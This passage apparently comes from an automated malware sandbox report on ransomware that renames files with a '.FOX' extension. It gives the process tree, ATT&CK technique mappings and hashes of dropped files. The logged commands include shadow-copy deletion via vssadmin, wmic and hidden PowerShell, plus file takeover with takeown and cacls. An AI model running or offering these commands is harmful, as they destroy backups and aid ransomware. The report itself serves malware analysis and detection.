    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\uY4fVpQ8.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:2072
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:2428
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:1144
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\r3b03AR1.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1576
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"
    3⤵
    - Views/modifies file attributes
    PID:336
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C
    3⤵
    PID:3188
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"
    3⤵
    - Modifies file permissions
    PID:1340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c vzDEJ12q.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:3164
  - - C:\Users\Admin\AppData\Local\Temp\vzDEJ12q.exe
      vzDEJ12q.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2064
    - - C:\Users\Admin\AppData\Local\Temp\vzDEJ12q64.exe
        
        vzDEJ12q.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner
        5⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:2588

C:\Windows\system32\taskeng.exe
taskeng.exe {30B6B2FD-7CBC-4BCA-AC60-C77C3C7BF695} S-1-5-21-4219371764-2579186923-3390623117-1000:NVACMPYA\Admin:Interactive:[1]
1⤵
PID:3340
- C:\Windows\SYSTEM32\cmd.exe
  C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\fEge4Ip6.bat"
  2⤵
  PID:2764
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:2880
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic SHADOWCOPY DELETE
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3460
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3844

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:896

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\[[email protected] ].6MyrtBan-13R3VrQ2.FOX
1⤵
- Modifies registry class
PID:1072

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\#FOX_README#.rtf

Filesize
8KB

MD5
9c2a234571b56b5969dd6ab0b836dd60

SHA1
43ab638f0a7a8423cbb35326df94a7b23f26c2c9

SHA256
564464536bf616064217fdf6353af61757d4b33e3baf337471e8007b8a5511d4

SHA512
9c8e4a7b9edbdcffc44e7b132c6008e66bdde58a1aff04710a618fbc59f4b460efae03e0aaf238d3e3fa7e111c692dc6999b58b1569b045ca1a89c5a0106d474

Download Submit
C:\Users\Admin\AppData\Local\Temp\NWxX9xnj.exe

Filesize
1.2MB

MD5
76b640aa00354e46b29ca7ac2adfd732

SHA1
afebf9d72ba7186afefebf4deda87675621b0b8b

SHA256
0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7

SHA512
fecb15238714c786098f1dd0bb18696ab15634228ec3a48c900fd843e817d4c24607bdf6fb58e0321da3e1c1e49305ec919dddabbd34727acec8fbd6cb6fd552

Download Submit
C:\Users\Admin\AppData\Local\Temp\NWxX9xnj.exe

Filesize
1.2MB

MD5
76b640aa00354e46b29ca7ac2adfd732

SHA1
afebf9d72ba7186afefebf4deda87675621b0b8b

SHA256
0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7

SHA512
fecb15238714c786098f1dd0bb18696ab15634228ec3a48c900fd843e817d4c24607bdf6fb58e0321da3e1c1e49305ec919dddabbd34727acec8fbd6cb6fd552

Download Submit
C:\Users\Admin\AppData\Local\Temp\elog_3E7A64A8E819EB47.txt

Filesize
16KB

MD5
f264af5ae6f92d69bed0e4fe244d11b5

SHA1
1317301ef4d35db080874aa6880dea730cd4258e

SHA256
a1ff98992f54e6d93a4c0a26ab49aacb52c0b872f24f380673385b4a68b83a54

SHA512
471a22f072a71e42f4bf6e81c19a882541dfdcf195385b1c403fe578c316ef0503eb8d5b54bd4f3a3d142000cbf20f46c0a71e69a230a4639579d2aa98470f87

Download Submit
C:\Users\Admin\AppData\Local\Temp\r3b03AR1.bat

Filesize
246B

MD5
d798d4eff7e7b1ed4c3b62fc4327ffe2

SHA1
7d030580ed6c4e362c66b04f700e560756e0838d

SHA256
b7c2224b00a3b7d842cb758f81d862cbbf4ac37d42e7b9a61155c02d9dffcf99

SHA512
afe78c42b73e59d5e9069093998e49ddd7ee67cf7a948fb6bf639647acab9382655978b785fa8c412616cbca571a472b75625ce7eb68f7dd36a3691469c811d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\r3b03AR1.bat

Filesize
246B

MD5
d798d4eff7e7b1ed4c3b62fc4327ffe2

SHA1
7d030580ed6c4e362c66b04f700e560756e0838d

SHA256
b7c2224b00a3b7d842cb758f81d862cbbf4ac37d42e7b9a61155c02d9dffcf99

SHA512
afe78c42b73e59d5e9069093998e49ddd7ee67cf7a948fb6bf639647acab9382655978b785fa8c412616cbca571a472b75625ce7eb68f7dd36a3691469c811d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\re2N8DNf.txt

Filesize
14B

MD5
8eb51985066cb0782077f624013d47a2

SHA1
0549d07d51454e73b937946ba1887cacfce71835

SHA256
5537d10911f09132033b185344f75ea1a0ed7e5509b3be00bd8bc93d477baa44

SHA512
539a7160bb41366a74d8859b080724f5838132428f672c2bba7ef9c9a259823f15074adec75567bea6724f09d681c04b8763a2f495eff3436ff17420cb7bf0f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\vzDEJ12q.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\vzDEJ12q.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\vzDEJ12q64.exe

Filesize
221KB

MD5
3026bc2448763d5a9862d864b97288ff

SHA1
7d93a18713ece2e7b93e453739ffd7ad0c646e9e

SHA256
7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

SHA512
d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\86RKTLMGLGY7AOEJXVMJ.temp

Filesize
7KB

MD5
b6d194837856a02fccff7db8ff596b2e

SHA1
54365ce171f1a3ddfa9259c3ee4d89a6f9dbc841

SHA256
4755c04d2919321213953028448a2b1c27c6110ea78026360382b31d3ddf00bd

SHA512
eb4f2d4e93ee8c06969dbed818fa66b2ada79e07a8c079ac9381b2b1527531c296769a5dfe306866e8ef6cd0ef281dafe9fe2a8cf789b1805c280538e6cb711f

Download Submit
C:\Users\Admin\AppData\Roaming\fEge4Ip6.bat

Filesize
415B

MD5
6fc2bcbf6db37325200052649655b0f1

SHA1
429fed37b34c491030821d9bbde086b6e3f16749

SHA256
5f738866ef9ea470612bc0e997f74477409204bfdf16d963db6765e566220723

SHA512
2762c4effefc6a1b13f53adac74c16a750589e8e48980de34b65244f065cb469d6f19f14f48ceff70e0f51fd0ef2e1863f3df77fc86a1180754b1245084c463a

Download Submit
C:\Users\Admin\AppData\Roaming\ww8VhNEd.vbs

Filesize
260B

MD5
ffa7042f5ade9924ca3c2c31919327d6

SHA1
458e394d8ac2c5f5aab8f1c5af7a5bc6ca8c367b

SHA256
042bb9295f7a9db949d813a2946a0fa5ca45a05c6eb844cc68a3931d092c9075

SHA512
d8c8867b03d729bb2c057f8c8ac4f12f8618cc0d3bb18a4b4b624d2096a451ff0f82f73b290f2262b7916b6a82db91fd3b19c94ecb80c9dc21e577f1fe70bc7e

Download Submit
\Users\Admin\AppData\Local\Temp\NWxX9xnj.exe

Filesize
1.2MB

MD5
76b640aa00354e46b29ca7ac2adfd732

SHA1
afebf9d72ba7186afefebf4deda87675621b0b8b

SHA256
0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7

SHA512
fecb15238714c786098f1dd0bb18696ab15634228ec3a48c900fd843e817d4c24607bdf6fb58e0321da3e1c1e49305ec919dddabbd34727acec8fbd6cb6fd552

Download Submit
\Users\Admin\AppData\Local\Temp\NWxX9xnj.exe

Filesize
1.2MB

MD5
76b640aa00354e46b29ca7ac2adfd732

SHA1
afebf9d72ba7186afefebf4deda87675621b0b8b

SHA256
0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7

SHA512
fecb15238714c786098f1dd0bb18696ab15634228ec3a48c900fd843e817d4c24607bdf6fb58e0321da3e1c1e49305ec919dddabbd34727acec8fbd6cb6fd552

Download Submit
\Users\Admin\AppData\Local\Temp\vzDEJ12q.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\vzDEJ12q64.exe

Filesize
221KB

MD5
3026bc2448763d5a9862d864b97288ff

SHA1
7d93a18713ece2e7b93e453739ffd7ad0c646e9e

SHA256
7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

SHA512
d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

Download Submit
memory/2028-69-0x0000000002410000-0x0000000002450000-memory.dmp

Filesize
256KB

Download
memory/2028-66-0x00000000736E0000-0x0000000073C8B000-memory.dmp

Filesize
5.7MB

Download
memory/2028-67-0x0000000002410000-0x0000000002450000-memory.dmp

Filesize
256KB

Download
memory/2028-70-0x00000000736E0000-0x0000000073C8B000-memory.dmp

Filesize
5.7MB

Download
memory/2028-68-0x0000000002410000-0x0000000002450000-memory.dmp

Filesize
256KB

Download
memory/2028-65-0x00000000736E0000-0x0000000073C8B000-memory.dmp

Filesize
5.7MB

Download
memory/2064-10685-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2920-62-0x0000000000400000-0x0000000000538000-memory.dmp

Filesize
1.2MB

Download
memory/3068-14697-0x0000000000400000-0x0000000000538000-memory.dmp

Filesize
1.2MB

Download
memory/3068-12282-0x0000000000400000-0x0000000000538000-memory.dmp

Filesize
1.2MB

Download
memory/3068-3293-0x0000000000400000-0x0000000000538000-memory.dmp

Filesize
1.2MB

Download
memory/3164-9404-0x0000000000260000-0x00000000002D7000-memory.dmp

Filesize
476KB

Download
memory/3164-2063-0x0000000000260000-0x00000000002D7000-memory.dmp

Filesize
476KB

Download
memory/3844-14704-0x000000001B360000-0x000000001B642000-memory.dmp

Filesize
2.9MB

Download
memory/3844-14705-0x0000000001F40000-0x0000000001F48000-memory.dmp

Filesize
32KB

Download
memory/3844-14707-0x000007FEF42C0000-0x000007FEF4C5D000-memory.dmp

Filesize
9.6MB

Download
memory/3844-14708-0x0000000002B00000-0x0000000002B80000-memory.dmp

Filesize
512KB

Download
memory/3844-14709-0x0000000002B00000-0x0000000002B80000-memory.dmp

Filesize
512KB

Download
memory/3844-14710-0x000007FEF42C0000-0x000007FEF4C5D000-memory.dmp

Filesize
9.6MB

Download
memory/3844-14711-0x0000000002B00000-0x0000000002B80000-memory.dmp

Filesize
512KB

Download
memory/3844-14713-0x000007FEF42C0000-0x000007FEF4C5D000-memory.dmp

Filesize
9.6MB

Download